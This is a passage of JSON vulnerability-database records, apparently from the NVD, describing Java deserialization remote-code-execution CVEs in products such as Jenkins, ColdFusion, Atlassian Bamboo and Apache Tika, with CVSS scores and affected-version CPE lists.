"cpe:2.3:a:apache:camel:2.17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-13T12:30:24", "description": "The Web Console in Commvault Edge Server 10 R2 allows remote attackers to execute arbitrary OS commands via crafted serialized data in a cookie.", "cvss3": {}, "published": "2015-11-04T03:59:00", "type": "cve", "title": "CVE-2015-7253", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7253"], "modified": "2015-11-04T18:59:00", "cpe": ["cpe:/a:commvault:edge_server:10"], "id": "CVE-2015-7253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7253", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:commvault:edge_server:10:r2:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:46:23", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-12T23:59:00", "type": "cve", "title": "CVE-2016-9299", "cwe": ["CWE-90"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2019-05-22T15:06:00", "cpe": ["cpe:/a:jenkins:jenkins:2.19.2", "cpe:/o:fedoraproject:fedora:25", "cpe:/a:jenkins:jenkins:2.31"], "id": "CVE-2016-9299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:25:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.19.2:*:*:*:lts:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.31:*:*:*:-:*:*:*"]}, {"lastseen": "2023-08-07T06:34:22", "description": "Intel McAfee ePolicy Orchestrator (ePO) 4.6.9 and earlier, 5.0.x, 5.1.x before 5.1.3 Hotfix 1106041, and 5.3.x before 5.3.1 Hotfix 1106041 allow remote attackers to execute arbitrary code via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.3, 
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2016-01-08T20:59:00", "type": "cve", "title": "CVE-2015-8765", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8765"], "modified": "2019-02-14T19:21:00", "cpe": ["cpe:/a:mcafee:epolicy_orchestrator:5.0.1", "cpe:/a:mcafee:epolicy_orchestrator:4.6.9"], "id": "CVE-2015-8765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8765", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mcafee:epolicy_orchestrator:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mcafee:epolicy_orchestrator:4.6.9:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-28T06:48:43", "description": "Adobe ColdFusion has an Untrusted Data Deserialization vulnerability. 
This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-01T08:29:00", "type": "cve", "title": "CVE-2017-11283", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11283"], "modified": "2020-09-04T14:09:00", "cpe": ["cpe:/a:adobe:coldfusion:2016", "cpe:/a:adobe:coldfusion:11.0"], "id": "CVE-2017-11283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11283", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:coldfusion:2016:update1:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update6:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update9:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update5:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update3:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update10:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update4:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update3:*:*:*:*:*:*", 
"cpe:2.3:a:adobe:coldfusion:11.0:update7:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update11:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update2:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update8:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update2:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update4:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update12:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update1:*:*:*:*:*:*"]}, {"lastseen": "2023-06-23T15:05:43", "description": "OpenText Documentum D2 (formerly EMC Documentum D2) 4.x allows remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the BeanShell (bsh) and Apache Commons Collections (ACC) libraries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-02-22T16:59:00", "type": "cve", "title": "CVE-2017-5586", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5586"], "modified": "2017-03-01T02:59:00", "cpe": ["cpe:/a:opentext:documentum_d2:4.6", "cpe:/a:opentext:documentum_d2:4.1", "cpe:/a:opentext:documentum_d2:4.5", 
"cpe:/a:opentext:documentum_d2:4.0", "cpe:/a:opentext:documentum_d2:4.2", "cpe:/a:opentext:documentum_d2:4.4", "cpe:/a:opentext:documentum_d2:4.3"], "id": "CVE-2017-5586", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5586", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:opentext:documentum_d2:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:opentext:documentum_d2:4.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:33:39", "description": "Remote Code Execution is possible in Code42 CrashPlan 5.4.x via the org.apache.commons.ssl.rmi.DateRMI Java class, because (upon instantiation) it creates an RMI server that listens on a TCP port and deserializes objects sent by TCP clients.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-27T18:29:00", "type": "cve", "title": "CVE-2017-9830", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9830"], "modified": "2017-07-05T17:57:00", "cpe": ["cpe:/a:code42:crashplan:5.4"], "id": "CVE-2017-9830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9830", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:code42:crashplan:5.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:47:13", "description": "JBoss RESTEasy before version 3.1.2 could be forced into parsing a request with YamlProvider, resulting in unmarshalling of potentially untrusted data which could allow an attacker to execute arbitrary code with RESTEasy application permissions.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-09T20:29:00", "type": "cve", "title": "CVE-2016-9606", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-10-12T10:29:00", "cpe": ["cpe:/a:redhat:resteasy:3.1.1"], "id": "CVE-2016-9606", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9606", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:a:redhat:resteasy:3.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-07T05:55:29", "description": "An unspecified resource in Atlassian Bamboo before 5.9.9 and 5.10.x before 5.10.0 allows remote attackers to execute arbitrary Java code via serialized data to the JMS port.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-08T19:59:00", "type": "cve", "title": "CVE-2015-8360", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8360"], "modified": "2018-10-09T19:58:00", "cpe": ["cpe:/a:atlassian:bamboo:3.4.1", "cpe:/a:atlassian:bamboo:5.9.2", "cpe:/a:atlassian:bamboo:4.4.5", "cpe:/a:atlassian:bamboo:3.0.2", "cpe:/a:atlassian:bamboo:3.1.1", "cpe:/a:atlassian:bamboo:4.4.2", "cpe:/a:atlassian:bamboo:2.5", "cpe:/a:atlassian:bamboo:3.2", "cpe:/a:atlassian:bamboo:3.4.2", "cpe:/a:atlassian:bamboo:3.4.3", "cpe:/a:atlassian:bamboo:4.4", "cpe:/a:atlassian:bamboo:3.4.5", "cpe:/a:atlassian:bamboo:5.7.2", "cpe:/a:atlassian:bamboo:5.1", "cpe:/a:atlassian:bamboo:5.8.5", "cpe:/a:atlassian:bamboo:5.0.1", "cpe:/a:atlassian:bamboo:2.5.1", "cpe:/a:atlassian:bamboo:3.3.4", "cpe:/a:atlassian:bamboo:2.5.2", "cpe:/a:atlassian:bamboo:4.0.1", 
"cpe:/a:atlassian:bamboo:4.2.1", "cpe:/a:atlassian:bamboo:2.6.2", "cpe:/a:atlassian:bamboo:2.7.2", "cpe:/a:atlassian:bamboo:3.0", "cpe:/a:atlassian:bamboo:4.4.4", "cpe:/a:atlassian:bamboo:2.5.3", "cpe:/a:atlassian:bamboo:5.9.1", "cpe:/a:atlassian:bamboo:4.0", "cpe:/a:atlassian:bamboo:5.7.1", "cpe:/a:atlassian:bamboo:4.4.8", "cpe:/a:atlassian:bamboo:5.2.2", "cpe:/a:atlassian:bamboo:5.5", "cpe:/a:atlassian:bamboo:3.3.3", "cpe:/a:atlassian:bamboo:2.4", "cpe:/a:atlassian:bamboo:4.1", "cpe:/a:atlassian:bamboo:5.8", "cpe:/a:atlassian:bamboo:5.9.4", "cpe:/a:atlassian:bamboo:4.3.1", "cpe:/a:atlassian:bamboo:2.6", "cpe:/a:atlassian:bamboo:5.2.1", "cpe:/a:atlassian:bamboo:5.6.2", "cpe:/a:atlassian:bamboo:3.1.4", "cpe:/a:atlassian:bamboo:5.1.1", "cpe:/a:atlassian:bamboo:4.4.1", "cpe:/a:atlassian:bamboo:4.2", "cpe:/a:atlassian:bamboo:3.3.2", "cpe:/a:atlassian:bamboo:5.8.1", "cpe:/a:atlassian:bamboo:4.3.2", "cpe:/a:atlassian:bamboo:4.3.4", "cpe:/a:atlassian:bamboo:2.6.1", "cpe:/a:atlassian:bamboo:3.1", "cpe:/a:atlassian:bamboo:2.7.3", "cpe:/a:atlassian:bamboo:2.4.1", "cpe:/a:atlassian:bamboo:3.2.2", "cpe:/a:atlassian:bamboo:2.7", "cpe:/a:atlassian:bamboo:2.3.1", "cpe:/a:atlassian:bamboo:5.6", "cpe:/a:atlassian:bamboo:4.3.3", "cpe:/a:atlassian:bamboo:4.3", "cpe:/a:atlassian:bamboo:5.9", "cpe:/a:atlassian:bamboo:5.0", "cpe:/a:atlassian:bamboo:5.9.7", "cpe:/a:atlassian:bamboo:3.0.1", "cpe:/a:atlassian:bamboo:4.1.1", "cpe:/a:atlassian:bamboo:3.3", "cpe:/a:atlassian:bamboo:5.8.2", "cpe:/a:atlassian:bamboo:2.7.4", "cpe:/a:atlassian:bamboo:5.3", "cpe:/a:atlassian:bamboo:2.5.5", "cpe:/a:atlassian:bamboo:3.4", "cpe:/a:atlassian:bamboo:4.4.3", "cpe:/a:atlassian:bamboo:3.4.4", "cpe:/a:atlassian:bamboo:3.3.1", "cpe:/a:atlassian:bamboo:4.1.2", "cpe:/a:atlassian:bamboo:3.0.3", "cpe:/a:atlassian:bamboo:5.7", "cpe:/a:atlassian:bamboo:2.4.3", "cpe:/a:atlassian:bamboo:5.4.2", "cpe:/a:atlassian:bamboo:2.7.1", "cpe:/a:atlassian:bamboo:3.1.3", "cpe:/a:atlassian:bamboo:5.6.1", 
"cpe:/a:atlassian:bamboo:5.2", "cpe:/a:atlassian:bamboo:2.4.2", "cpe:/a:atlassian:bamboo:2.6.3", "cpe:/a:atlassian:bamboo:5.4", "cpe:/a:atlassian:bamboo:5.9.3", "cpe:/a:atlassian:bamboo:5.4.1"], "id": "CVE-2015-8360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:bamboo:5.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:atlassian:bamboo:5.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.6:*:*:*:*:*:*:*", 
"cpe:2.3:a:atlassian:bamboo:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:bamboo:4.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:40:31", "description": "Apache Tika before 1.14 allows Java code execution for serialized objects embedded in MATLAB files. 
The issue exists because Tika invokes JMatIO to do native deserialization.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T21:59:00", "type": "cve", "title": "CVE-2016-6809", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6809"], "modified": "2020-08-19T19:17:00", "cpe": ["cpe:/a:apache:tika:1.13", "cpe:/a:apache:nutch:2.3.1"], "id": "CVE-2016-6809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6809", "cvss": {"score": 7.5, 